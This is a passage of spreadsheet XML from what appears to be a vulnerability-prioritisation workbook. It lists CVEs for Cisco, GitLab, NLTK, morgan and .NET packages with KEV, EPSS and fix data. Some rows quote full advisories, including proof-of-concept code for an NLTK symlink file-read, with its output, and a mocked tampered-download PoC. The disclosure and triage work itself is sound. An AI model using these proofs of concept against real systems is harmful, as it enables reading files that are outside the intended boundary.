      <c r="I440" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K440" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr"/>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R440" s="5" t="inlineStr"/>
      <c r="S440"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440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D441" s="5" t="inlineStr"/>
      <c r="E441" s="5" t="inlineStr"/>
      <c r="F441" s="5" t="inlineStr"/>
      <c r="G441" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J441" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K441" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr"/>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr"/>
      <c r="S44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41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D442" s="5" t="inlineStr"/>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="inlineStr"/>
      <c r="G442" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H442" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I442" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K442" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr"/>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr"/>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D443" s="5" t="inlineStr"/>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="inlineStr"/>
      <c r="G443" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H443" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I443" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J443" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K443" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr"/>
      <c r="P443" s="5" t="inlineStr"/>
      <c r="Q443" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R443" s="5" t="inlineStr"/>
      <c r="S443"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443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T443"/>
  <conditionalFormatting sqref="E2:E44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4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s>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet9.xml><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:T109" /><sheetViews><sheetView workbookViewId="0"><pane xSplit="3" ySplit="1" topLeftCell="D2" activePane="bottomRight" state="frozen" /><selection pane="topRight" /><selection pane="bottomLeft" /><selection pane="bottomRight" activeCell="A1" sqref="A1" /></sheetView></sheetViews><sheetFormatPr baseColWidth="8" defaultRowHeight="15" /><cols><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sheetData><row r="1"><c r="A1" s="4" t="inlineStr"><is><t>Priority</t></is></c><c r="B1" s="4" t="inlineStr"><is><t>Reason</t></is></c><c r="C1" s="4" t="inlineStr"><is><t>ID</t></is></c><c r="D1" s="4" t="inlineStr"><is><t>CVSS</t></is></c><c r="E1" s="4" t="inlineStr"><is><t>Severity</t></is></c><c r="F1" s="4" t="inlineStr"><is><t>Score src</t></is></c><c r="G1" s="4" t="inlineStr"><is><t>KEV</t></is></c><c r="H1" s="4" t="inlineStr"><is><t>EPSS</t></is></c><c r="I1" s="4" t="inlineStr"><is><t>SSVC</t></is></c><c r="J1" s="4" t="inlineStr"><is><t>Watchlist</t></is></c><c r="K1" s="4" t="inlineStr"><is><t>Vendor / Product</t></is></c><c r="L1" s="4" t="inlineStr"><is><t>Package</t></is></c><c r="M1" s="4" t="inlineStr"><is><t>Fixed in</t></is></c><c r="N1" s="4" t="inlineStr"><is><t>Sources</t></is></c><c r="O1" s="4" t="inlineStr"><is><t>Published</t></is></c><c r="P1" s="4" t="inlineStr"><is><t>Last Modified</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>KEV Due</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="T1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D2" s="5" t="inlineStr" /><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2" s="5" t="inlineStr" /><c r="H2" s="5" t="n"><v>0.868</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr" /><c r="L2" s="5" t="inlineStr"><is><t>Go:gitea.dev</t></is></c><c r="M2" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N2" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q2" s="5" t="inlineStr" /><c r="R2" s="5" t="inlineStr" /><c r="S2" s="5" t="inlineStr"><is><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is></c><c r="T2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C3" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D3" s="5" t="n"><v>5.4</v></c><c r="E3" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G3" s="5" t="inlineStr" /><c r="H3" s="5" t="n"><v>0.002</v></c><c r="I3" s="5" t="inlineStr" /><c r="J3" s="5" t="inlineStr" /><c r="K3" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L3" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M3" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N3" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O3" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P3" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q3" s="5" t="inlineStr" /><c r="R3" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S3" s="5" t="inlineStr"><is><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is></c><c r="T3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D4" s="5" t="inlineStr" /><c r="E4" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G4" s="5" t="inlineStr" /><c r="H4" s="5" t="n"><v>0.001</v></c><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr" /><c r="K4" s="5" t="inlineStr" /><c r="L4" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M4" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N4" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O4" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P4" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q4" s="5" t="inlineStr" /><c r="R4" s="5" t="inlineStr" /><c r="S4" s="5" t="inlineStr"><is><t>NLTK's package downloader in nltk/downloader.py does not verify file integrity after download and before extraction.

The download flow at lines 789-825:
1. File is downloaded to a temp path via HTTP
2. os.replace(tmp_filepath, filepath) moves it to the final location (line 799)
3. Extraction begins via _unzip_iter() (line 825)

Between steps 2 and 3, there is no SHA-256 verification. The checksum logic exists in _pkg_status() (lines 982-1015) but it is only used BEFORE download as a status check ("is this package already installed and up-to-date?"). It is never called after download to verify the file that was actually received.

Attack vectors:
1. MITM during HTTP download (NLTK downloads from http:// by default on some mirrors)
2. Race condition on shared filesystems (attacker replaces file between os.replace and _unzip_iter)
3. DNS poisoning redirecting to attacker-controlled server

PoC:
```python
import nltk
import unittest.mock
import zipfile
import io
import os

# Create a malicious zip that will be "downloaded"
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('punkt_tab/tokenizers/punkt_tab/english.pickle', 
                b'MALICIOUS PAYLOAD - attacker controlled content')

# Patch urllib to return our malicious zip
with unittest.mock.patch('urllib.request.urlopen') as mock_urlopen:
    mock_response = unittest.mock.MagicMock()
    mock_response.read.return_value = malicious_zip.getvalue()
    mock_response.headers = {'Content-Length': str(len(malicious_zip.getvalue()))}
    mock_urlopen.return_value = mock_response
    
    # Download proceeds, no integrity check catches the swap
    # nltk.download('punkt_tab')  # Would install attacker payload
```

This is distinct from CVE-2024-39705 (pickle deserialization via download) and CVE-2025-14009 (zip-slip path traversal). Those address what happens AFTER extraction. This finding addresses the gap BEFORE extraction where integrity is never verified.

Suggested fix: After os.replace() and before _unzip_iter(), compute SHA-256 of the final file and compare against the expected checksum from the package index. Reject and delete the file if the hash does not match.</t></is></c><c r="T4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D5" s="5" t="inlineStr" /><c r="E5" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G5" s="5" t="inlineStr" /><c r="H5" s="5" t="n"><v>0.002</v></c><c r="I5" s="5" t="inlineStr" /><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr" /><c r="L5" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M5" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N5" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O5" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P5" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q5" s="5" t="inlineStr" /><c r="R5" s="5" t="inlineStr" /><c r="S5" s="5" t="inlineStr"><is><t>### Impact

Morgan writes attacker-controlled request data to the access log through its tokens. The 1.11.0 fix neutralizes C0 control characters, DEL, and backslash, but it does not escape the Unicode line separators `U+0085` (NEL), `U+2028` (LINE SEPARATOR), or `U+2029` (PARAGRAPH SEPARATOR). These code points are reachable through several tokens, including the request URL (`:url`), request headers such as `:user-agent` and `:referrer`, arbitrary `:req[header]` values, and the Basic auth username (`:remote-user`). NEL is valid `obs-text` in HTTP header values, so an attacker can place it in an ordinary request header.

When such a value is logged, the raw code points survive into the emitted access-log record, and downstream ECMAScript-aware or Unicode-aware log processing splits the single physical record into multiple logical records. This allows an attacker to forge log entries. The built-in `combined`, `common`, `default`, and `short` formats are affected, as well as any custom format. This is an incomplete fix of CVE-2026-5078.

### Patches

Users should upgrade to version 1.12.0.

### Workarounds

None. The affected values include the request URL and request headers, which are core to access logging, so there is no practical format-based mitigation. Upgrade to 1.12.0.</t></is></c><c r="T5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D6" s="5" t="inlineStr" /><c r="E6" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F6" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G6" s="5" t="inlineStr" /><c r="H6" s="5" t="n"><v>0.01</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr" /><c r="K6" s="5" t="inlineStr" /><c r="L6" s="5" t="inlineStr"><is><t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M6" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N6" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P6" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q6" s="5" t="inlineStr" /><c r="R6" s="5" t="inlineStr" /><c r="S6" s="5" t="inlineStr"><is><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is></c><c r="T6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D7" s="5" t="inlineStr" /><c r="E7" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G7" s="5" t="inlineStr" /><c r="H7" s="5" t="n"><v>0.002</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr" /><c r="K7" s="5" t="inlineStr" /><c r="L7" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M7" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N7" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P7" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q7" s="5" t="inlineStr" /><c r="R7" s="5" t="inlineStr" /><c r="S7" s="5" t="inlineStr"><is><t>## Summary

`IPIPANCorpusReader` (`nltk/corpus/reader/ipipan.py`) exposes public methods, `channels()`, `domains()`, `categories()`, and `fileids(channels=...)`, that accept a caller supplied `fileids` list and read a file via a completely unprotected builtin `open()` call, with no `nltk.pathsec` involvement at all. A symlink placed inside the corpus root, with a name containing no separators or `..`, passes NLTK's existing traversal checks and is opened directly, reading a file from anywhere on the filesystem the process can access.

## Root cause

All four methods route through `_get_tag()`:

```python
def _get_tag(self, f, tag):
    tags = []
    with open(f) as infile:   # builtin open(), no pathsec involvement
        header = infile.read()
    ...
```

`f` arrives via `_list_header_files()` / `_list_morph_files_by()`, both of which call:

```python
f.replace("morph.xml", "header.xml")
```

on the result of `self.abspath(...)` or `self.abspaths(...)`. `FileSystemPathPointer` subclasses `str`, so `.replace()` returns a plain Python string, silently discarding the `PathPointer` wrapper. That plain string is handed straight to builtin `open()`.

This is a more severe variant of the same CWE-59 class already fixed elsewhere in this codebase (`CorpusReader.open()`, `NKJPCorpusReader.add_root()`, and the recent `FramenetCorpusReader` fix): those route file access through `nltk.pathsec.validate_path()`, at minimum the global, non-scoped check, before opening. Here, converting the `PathPointer` to a plain string before calling `open()` skips `pathsec` completely, not just the corpus-root-scoped check, so the symlink target does not even need to land under a registered `nltk.data.path` root.

Plain literal `../` traversal in the fileid is still blocked by `FileSystemPathPointer.join()`, so this is specifically the symlink variant, not a regression of the older, simpler traversal class.

## Proof of concept

Constructed the normal, documented way, `fileids` as a regex over file paths, so the reader auto-discovers whatever `.xml` files exist in its root with no special knowledge of the planted symlink.

```python
import os
import tempfile

from nltk.corpus.reader.ipipan import IPIPANCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "ipipan")
os.makedirs(corpus_root)

with open(os.path.join(corpus_root, "real_morph.xml"), "w") as f:
    f.write("&lt;channel&gt;legit&lt;/channel&gt;")

secret_dir = os.path.join(root, "outside_ipipan_root")
os.makedirs(secret_dir)
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write("&lt;channel&gt;TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT&lt;/channel&gt;")

os.symlink(secret_path, os.path.join(corpus_root, "evil_link.xml"))

reader = IPIPANCorpusReader(corpus_root, r".*\.xml")
print("Auto-discovered fileids:", sorted(reader.fileids()))

result = reader.channels(fileids=["evil_link.xml"])
print(result)
```

Actual output when run against current `develop`:

```
Auto-discovered fileids: ['evil_link.xml', 'real_morph.xml']
['TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT']
```

That content was read from `secret_path`, a file entirely outside `corpus_root`. No exception raised anywhere. The planted symlink even surfaces naturally in the reader's own `fileids()` listing, exactly as a real file would.

Verified separately that literal `../` traversal in the fileid is still rejected (`ValueError: Traversal blocked`), confirming this is specifically the symlink gap, not a broader regression.

## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered or shared corpus directory (`SECURITY.md` names "shared environments... multi-tenant pipelines" as the project's own stated threat model) plus a completely normal API call.
- Core corpus-reader code, reached through plain `import nltk` and documented, programmatic usage (`words()`, `sents()`, `channels()`, etc.), not a demo or GUI tool.
- Same reader category, and same CWE-59 mechanism, already treated as CVE-worthy twice in this codebase for `FramenetCorpusReader` and `NKJPCorpusReader`.
- Not a bypass of a claimed fix. `ipipan.py` has never had security hardening applied, and has no dedicated test coverage at all.

## CVSS v3.1

- **AV:L, AC:L**: exploitation is local filesystem symlink placement, then immediate and deterministic once triggered.
- **PR:L**: the attacker needs some pre-existing ability to plant a symlink somewhere reachable, not zero privilege, but not elevated either.
- **UI:N**: fires during routine, automated corpus processing, no separate victim action.
- **S:U**: stays within the same process's existing privileges.
- **C:H, I:N, A:N**: arbitrary file read only, no write, no crash.

## Suggested fix

Route `_get_tag()` through `nltk.pathsec.validate_path()` with the corpus root as `required_root`, or through `CorpusReader.open()`, instead of converting the `PathPointer` to a plain string and calling builtin `open()` directly. The same fix pattern already applied to `FramenetCorpusReader` and `NKJPCorpusReader` applies directly here.</t></is></c><c r="T7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D8" s="5" t="inlineStr" /><c r="E8" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F8" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G8" s="5" t="inlineStr" /><c r="H8" s="5" t="n"><v>0.006</v></c><c r="I8" s="5" t="inlineStr" /><c r="J8" s="5" t="inlineStr" /><c r="K8" s="5" t="inlineStr" /><c r="L8" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M8" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N8" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P8" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q8" s="5" t="inlineStr" /><c r="R8" s="5" t="inlineStr" /><c r="S8" s="5" t="inlineStr"><is><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is></c><c r="T8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D9" s="5" t="inlineStr" /><c r="E9" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F9" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G9" s="5" t="inlineStr" /><c r="H9" s="5" t="n"><v>0.004</v></c><c r="I9" s="5" t="inlineStr" /><c r="J9" s="5" t="inlineStr" /><c r="K9" s="5" t="inlineStr" /><c r="L9" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M9" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N9" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P9" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q9" s="5" t="inlineStr" /><c r="R9" s="5" t="inlineStr" /><c r="S9" s="5" t="inlineStr"><is><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is></c><c r="T9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D10" s="5" t="inlineStr" /><c r="E10" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F10" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G10" s="5" t="inlineStr" /><c r="H10" s="5" t="n"><v>0.012</v></c><c r="I10" s="5" t="inlineStr" /><c r="J10" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K10" s="5" t="inlineStr" /><c r="L10" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M10" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N10" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P10" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q10" s="5" t="inlineStr" /><c r="R10" s="5" t="inlineStr" /><c r="S10" s="5" t="inlineStr"><is><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is></c><c r="T10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D11" s="5" t="inlineStr" /><c r="E11" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F11" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G11" s="5" t="inlineStr" /><c r="H11" s="5" t="n"><v>0.005</v></c><c r="I11" s="5" t="inlineStr" /><c r="J11" s="5" t="inlineStr" /><c r="K11" s="5" t="inlineStr" /><c r="L11" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Build.Tasks.Git, NuGet:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M11" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N11" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P11" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q11" s="5" t="inlineStr" /><c r="R11" s="5" t="inlineStr" /><c r="S11" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Microsoft.Build.Tasks.Git and Microsoft.SourceLink.AzureRepos.Git. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

Improper removal of sensitive information before storage or transfer in .NET allows an unauthorized attacker to disclose information over a network.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C`
- **Weakness:** CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer

## Affected Platforms

- **Platforms:** Windows, Linux, macOS
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name="published-nuget-packages"&gt;&lt;/a&gt;Published NuGet packages
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303

